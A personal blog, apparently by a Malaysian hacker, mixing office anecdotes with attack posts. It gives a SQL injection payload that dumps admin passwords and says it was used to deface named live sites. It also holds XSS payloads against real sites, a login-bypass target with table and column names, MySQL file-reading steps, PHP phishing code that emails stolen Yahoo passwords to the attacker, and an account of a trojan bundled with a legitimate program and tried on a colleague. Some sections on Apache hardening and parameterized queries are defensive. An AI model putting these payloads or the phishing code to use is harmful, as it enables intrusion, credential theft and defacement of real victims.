SQL Injections

Posted by ghimau under
Based on the milw0rm exploit, I managed to deface these pages via SQL injection.
I changed the SQL injection a bit.


view_sub_cat.php?cat_id=99%20UNION%20ALL%20SELECT%201,2,concat(,admin_user,::,admin_password,),4%20FROM%20admin_users--


http://www.virtuosoworld.com/



http://bye5.com/indexXXXX.php


Greetz to : t0pP8uZz & xprog
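
Seen from the defending side, the request above only works because view_sub_cat.php pastes cat_id straight into its SQL text. The sketch below is an added example, not code from this blog or from the affected application: it rebuilds that flaw on a constructed SQLite database and shows the two fixes (bound parameter, integer validation). The sub_cats table, its columns and the sample rows are assumptions; only admin_users, admin_user and admin_password come from the post.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the shop database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE sub_cats (id INTEGER, cat_id INTEGER, name TEXT, descr TEXT);
        CREATE TABLE admin_users (admin_user TEXT, admin_password TEXT);
        INSERT INTO sub_cats VALUES (1, 5, 'Guitars', 'Six strings');
        INSERT INTO admin_users VALUES ('admin', 'constructed-hash');
    """)
    return db

QUERY = "SELECT id, cat_id, name, descr FROM sub_cats WHERE cat_id = "

def view_sub_cat_vulnerable(db, cat_id):
    # Weak: the request parameter is pasted into the SQL text, so a UNION
    # clause inside cat_id is parsed as part of the statement.
    return db.execute(QUERY + cat_id).fetchall()

def view_sub_cat_bound(db, cat_id):
    # Bound parameter: the whole string is compared as one value, never parsed.
    return db.execute(QUERY + "?", (cat_id,)).fetchall()

def view_sub_cat_hardened(db, cat_id):
    # cat_id is a numeric key, so also reject anything but 1-9 ASCII digits.
    if not re.fullmatch(r"[0-9]{1,9}", cat_id):
        raise ValueError("cat_id must be a positive integer")
    return view_sub_cat_bound(db, int(cat_id))

# Same shape as the request in the post, with SQLite's || instead of concat().
PAYLOAD = "99 UNION ALL SELECT 1,2,admin_user || '::' || admin_password,4 FROM admin_users--"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", view_sub_cat_vulnerable(db, PAYLOAD))
    print("bound:     ", view_sub_cat_bound(db, PAYLOAD))
    print("hardened:  ", view_sub_cat_hardened(db, "5"))
```

Binding alone already stops the UNION from being parsed; the digit check additionally turns the attempt into an error that can be logged.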

Defaced

Posted by ghimau under
Just to make aunty virus 'jeles' hihihi
Just to test sql injection in cgi pages..

Apache Hardening

Posted by ghimau under
Attn: alycia
Based on my findings yesterday, here are some hardening tips to your apache server.

1. To disable server-info: open your Apache httpd.conf and find the following paragraph:
<Location /server-info>
    SetHandler server-info
    Order deny,allow
    Allow from all
</Location>
Change it to this, then restart your Apache (httpd) server:
<Location /server-info>
    SetHandler server-info
    Order deny,allow
    #Allow from all
    Deny from all
</Location>

2. To disable server-status: open your Apache httpd.conf and find the following paragraph:
<Location /server-status>
    SetHandler server-status
    Order deny,allow
    Allow from all
</Location>
Change it to this, then restart your Apache (httpd) server:
<Location /server-status>
    SetHandler server-status
    Order deny,allow
    #Allow from all
    Deny from all
</Location>

3. To disable directory listing, which is the most crucial part: open your Apache httpd.conf and find the following paragraph (the Directory path shown is a placeholder; use the one in your own file):
<Directory "/path/to/your/web/root">
    Options FollowSymLinks ExecCGI Indexes
    AllowOverride None
    # Controls who can get stuff from this server.
    Order allow,deny
    Allow from all
</Directory>
Change it to this, then restart your Apache (httpd) server:
<Directory "/path/to/your/web/root">
    Options FollowSymLinks ExecCGI Indexes
    AllowOverride None
    # Controls who can get stuff from this server.
    Order allow,deny
    #Allow from all
    Deny from all
</Directory>

If you've done it right, you'll get a 403 Forbidden error message when trying to access the 'vulnerable' page.

Open source is secure only if you put some effort into securing it. Otherwise, it is more vulnerable compared to Windows.
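
To re-check a server for the three settings covered above, a small audit script helps. This is an added example, not part of the original post: it scans an httpd.conf for server-info/server-status handlers that are open to all clients and for Options lines that still include Indexes. It understands only the Apache 2.2-style Order/Allow/Deny directives used in the post, and the sample file and its Directory path are constructed.

```python
import re

# Constructed httpd.conf fragment; the Directory path is a made-up example.
SAMPLE_CONF = """\
<Location /server-info>
    SetHandler server-info
    Order deny,allow
    Allow from all
</Location>
<Location /server-status>
    SetHandler server-status
    Order deny,allow
    #Allow from all
    Deny from all
</Location>
<Directory "/var/www/html">
    Options FollowSymLinks ExecCGI Indexes
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
"""

def audit(conf_text):
    """Return (section, finding) pairs; simplified, does not evaluate Order."""
    findings, section, body = [], None, []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                      # commented-out directives are inert
        opened = re.match(r'<(Location|Directory)\s+"?([^">]+)"?\s*>', line, re.I)
        if opened:
            section, body = f"{opened.group(1)} {opened.group(2)}", []
        elif section and re.match(r"</(Location|Directory)>", line, re.I):
            handlers = {d[1] for d in body if d[0] == "sethandler" and len(d) > 1}
            exposed = handlers & {"server-info", "server-status"}
            if exposed and ["allow", "from", "all"] in body:
                findings.append((section, f"{sorted(exposed)[0]} handler is open to all clients"))
            if any(d[0] == "options" and "indexes" in [o.lstrip("+") for o in d[1:]] for d in body):
                findings.append((section, "Options Indexes enables directory listing"))
            section = None
        elif section:
            body.append(line.lower().split())
    return findings

if __name__ == "__main__":
    for where, what in audit(SAMPLE_CONF):
        print(f"{where}: {what}")
```

Note that Deny from all on a Directory block refuses every request beneath it, while removing Indexes from the Options line turns off only the generated listing; a directory without an index file then answers 403.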

Web Application

Posted by ghimau under
Att: alycia
Just now I did a very simple 'test' on that server, I found the directory listing is on. The interesting directories are :
/admin/
/server-status/
/server-info/

Both the server-* directories are only information disclosure vulnerabilities.
But the /admin/.. hmm.. looks interesting.

To do a complete pen-test needs a lot of time; there's no single silver bullet to 'hack'.

Last week, I found that the application is vulnerable to a cookie-session injection attack. I told abg mazani, and gave him the proper solution.

Thanks kecik13

Posted by ghimau under

Thank you kecik13, for the nice graphic. Quite bz these couple of days, didn't have much time to do my 'hacking'. Hihihi



GFI Languard 8.0

Posted by ghimau under
Downloaded the new version of languard http://www.gfi.com/lannetscan/
Didn't have much time to test it though.


Splash screen - looks the same as version 7.0


Performing a remote test on aunty virus's pc. :)

Boring..

Posted by ghimau under
Ah so boring.. to teach microsoft powerpoint..
Trying to do a POC on XSS. Just popping a simple alert dialog box.
[script]alert('POC of XSS by ghimau')[/script]

Click here : http://www.danceinterrupted.com/guestbook.asp

To redirect to another page, making it look like it has been defaced, use this script.
[script]window.location = "http://www.google.com"[/script]

SQL Injections

Posted by ghimau under
While helping Abg Mazani teaching Powerpoint Course, I did 'try' some sites hunting for sql injections login bypass.

Kak Zaimah didn't come to the office today.


Indian Journal Site login page


Logged in as the first user


Got the username


Cineplex login page



Logged in :)

Target : http://219.94.87.77/BP/Asps/Login/default.asp
Table UserAcc
Column varUserID,varUserPwd

Keyword is : blind *ql hihihi

Latest Points

Posted by ghimau under
My latest points on Hellbound Hackers :)



Hackers are here, where are you?

Isk..Isk.

Posted by ghimau under
Isk..Isk.. While I was creating the report for 'Pertandingan Laman Web', I noticed that En. Aziz's marks were missing. I told aunty virus about that.

We were busy searching for the file, almost 1 hour of blind search! The file was on Kak Liza's table all the while! Hampeh!

The sad thing is that the file is about 2 inches thick.. and I have to review the marks.. Ah! 'Tidak!'

New Tutorials

Posted by ghimau under
Added a couple of tutorials on Hacking Windows XP.

HackerMalaysia thread (Part 1) :
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=363&pid=2889#post_2889

HackerMalaysia thread(Part2):
http://www.hackermalaysia.com/forum/viewthread.php?forum_id=17&thread_id=364&pid=2890#post_2890

Pdf version:
Part 1 : http://www.geocities.com/terlaklintau/xp/XP1.pdf
Part2 : http://www.geocities.com/terlaklintau/xp/XP2.pdf

Hmm.. this morning aunty virus told me to settle 'Pertandingan Laman Web''s matters. She 'sempat mengumpat mak tiri' Hihihi

EL

Posted by ghimau under
EL? Emergency leave. Today I'm on EL :). Thanks to aunty virus, she's the one who 'hasut' me to take EL today. Wanna know the reason why? Hmm.. I think better it is kept secret between us. :)

Well, today is a wonderful day, which will be written in my life's diary. Aunty Virus, Kecik13, Alycia, and my girlfriend Alia, we all had lunch together at kfc. :) Yeah, a nice friendship is built from a strong foundation of sincerity. Ukhuwwah fillahi abadan.

To aunty virus, all this while, i 'kelentong' my awek, told her that kak zaimah is around 40's, she is fat. Hihihi..Sorry :P



My awek's car. She had an accident last 2 weeks. Luckily, she was safe.


Side view of her car

This picture has nothing to do with this blog entry, just to make aunty virus 'cuak' a bit. Hihihi

Trip to Cyberjaya

Posted by ghimau under
Yesterday morning, I received an SMS from aunty virus, "Sein, I tried to FTP to our secondary web server but couldn't get in."

Hmm.. when I came to the office, she asked me to go to telekom web hosting, at cyberjaya. We had a breakfast, at Jas Cafe, Serdang. I did 'kelentong' her several things, and she believed me :) Hahaha

Hmm.. and the most thrilling part is, we went there with my car, which had no road tax. Hihihi
We reached Telekom around 10.15 am, finishing our work around 3.30 pm.


Nice, using WatchGuard Firewall. Notice the baju kurung's shadow? Well, it belongs to aunty virus :)



Dell's server


Who is this?? Muhahaha.. Nice post my friend :)

More bugs in government site?

Posted by ghimau under
Hmm.. My Bos aunty virus asked me to call an officer regarding 'Pertandingan Laman Web'. While searching for his telephone number on his agency's site (a very well known government agency), I found a bug that 'might' lead to it being defaced! The infamous RFI bug. Hmm..

I didn't go any further to test the bug. I've informed the appropriate person handling this kind of issue.

http://xxx.xxxxx.xxx.xx/xxxxxx.php?section=[evil script]

IBM Security Site?

Posted by ghimau under
Hmm.. an IBM Security Site, regarding mitigating XSS attack. The funny thing is that, the site itself is vulnerable to XSS attack! What the hell :)

Just open (copy and paste it in your ie) the link below, and you'll notice a nice pop up, showing my name. Muhahaha

http://www-1.ibm.com/support/docview.wss?uid=swg21233077&loc=%22%3E%3Cbody%20onload=alert('ghimau')%20x=%22en_US

Added a tutorial on basic C programming. Posted in HackerMalaysia site. I've uploaded the pdf version to my site. Feel free to review it :)

Part 1
Part 2

Hacking History

Posted by ghimau under
Hmm.. I came across a nice pdf document regarding Hacking History.

Quite a dull evening. Need to take a break.

Hacking Via MySQL

Posted by ghimau under
Hmm..
Want to try hack your server via mysql?
Hihihi

Ok, you can 'print' any file on the server to the monitor (running mysql) using the load_file() function in MySQL.

Go to your command prompt.
mysql>

Type in the following command:
mysql>select load_file('c:/dns.txt');

dns.txt can be any file in your server

By using the load data infile statement, you can transfer any file or database content to a newly created database.

mysql>load data infile 'c:/dns.txt' into table table_name;

Ok.. so you want to copy a table to your newly created table?

mysql> create database db_ghimau;
mysql> use db_ghimau;
mysql> create table tbl_ghimau (filename varchar(20),content longblob);

Then copy the data!

mysql> insert into tbl_ghimau values ('user.frm',load_file('c:\\MySQL\\data\\mysql\\user.frm'));
mysql> insert into tbl_ghimau values ('user.MYI',load_file('c:\\MySQL\\data\\mysql\\user.MYI'));
mysql> insert into tbl_ghimau values ('user.MYD',load_file('c:\\MySQL\\data\\mysql\\user.MYD'));

Homestay..Homestay..

Posted by ghimau under
Hmm.. Today, aunty virus and i have to meet Dr Baharom UPEN, discussing about homestay's website. Argh..

Hmm.. the internet connection is so slow.. I think a snail is much faster!

I've called mastura from fbest, and sharifah from pelegong, asking them to send the details and information regarding their homestays, to develop a site for them.

Hmm.. it's not a big deal for me to create a site, but the problem is.. graphics !
I just cannot put my hands on 'graphics' :)

Hmm.. After all, I'm in the multimedia unit.. so this is what i have to do.. :(

My Exam Transcript

Posted by ghimau under
I called Adonis, regarding my C|EH exam transcript.
Presenting.. mark.. (How boastful of me :)



Remember to click the above image, to see a larger view..
So Kak Zaimah.. are you jeles? :P


Welcome To The Club

Posted by ghimau under
Welcome to Miss Alycia to hakes club.

May the force be with you..

Muhahahaha (Hacker's laugh)

APC

Posted by ghimau under
What is APC? Anugerah Perkhidmatan Cemerlang. :)
Today, I'm going for the ceremony..

Thanks a lot to my friends in UPTM, especially to my bos Puan Zaimah (who wants to be a hacker), my Pengarah, Puan Hajah Ruhazah and my best friend, Mazni (kecik 13).

Thanks to ya all.

Boring Evening

Posted by ghimau under
Hmm.. I'm working on a tutorial, to add contents via Events Calendar components. Arif from Gemas called Kak Zaimah this morning, asking for the tutorial.

Hmm.. yesterday, Kak Yati asked me, if i know how to enable Run menu, if it is disabled by virus.

OK.. I've created a simple VB Script, to do the job. You can download it at http://geocities.com/terlaklintau/recoverrun.txt
Just rename the file from recoverrun.txt to recoverrun.vbs. Double click on the file, and you have it :)

So wan and nizam can simply download and use this script.

Hmm.. Yes.. Kak Zaimah was so 'malu' because she bet me she could save a flash file from her IE. I'd told her she can't do that, but she was so 'degil'

Hihihi

Only 'hakes' can download flash file via Internet Explorer. Hahahaha

UIA Memories

Posted by ghimau under
Hmm.. UIA.. a nice place..
But unlucky for me.. I was there for only 1 semester.. :)


UIA waterfront



Nice .. huh!



Garden of Knowledge and Virtue



UIA...

Yahoo Mail Hack

Posted by ghimau under
Wanna hack yahoo mail?

Hihihi.. yes you can.. but you dont have to hack yahoo's server, the only thing you need is some sort of social engineering attack (some might called phishing).

Ok.. let's move on..

1. Create a php file, with the following code. Then upload it, on your favourite web hosting. But be sure that your hosting supports PHP.


youre_email@your_domain.com";
$dari=$login."@yahoo.com";
$mesej="Email :".$login."@yahoo.com , passwordnya :".$passwd;
$subjek = "DMangsa baru.. hihihih : ".$login."@yahoo.com";
$headers = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";
$headers .= 'From:'.$dari;
$kirim=mail($dari, $subjek, $mesej, $headers);
if($kirim)
{ header("location:http://mail.yahoo.com");
}
else { header("location:login.htm");
}
?>


2. Download the yahoo mail login page. Change the action= to your newly php file.

3. Send a link to your victim.

4. Just hope that he/she logs in, and you'll get a email automatically with the victim's username and password

Hi Guys

Posted by ghimau under
Hi.. sorry I didn't update my blog for a long time. I was quite bz doing some work. But guess what? I passed my CEH exam. Wasn't so hard.

Hmm.. my current project?
Hihihi..
I'm developing a new trojan, in Visual Basic. Looks almost the same as Sub7.
Hmm.. need to add some more functions.
1. Edit server - just like the Sub7
After finishing the project, i'll make it available to public :)

At the staging stage, I tested the trojan on Puan Zaimah (who wants to be a hacker), hihihi
She was so terrified and almost wanted to cry..

I packed the trojan with a legitimate program cleaner.exe.
I was so 'kesian' to her, because she almost wanted to nangis.
Ish..ish..
Only her nickname was 'ganas', but she is not 'ganas' at all.

Hihihihih
My Client trojan in action :)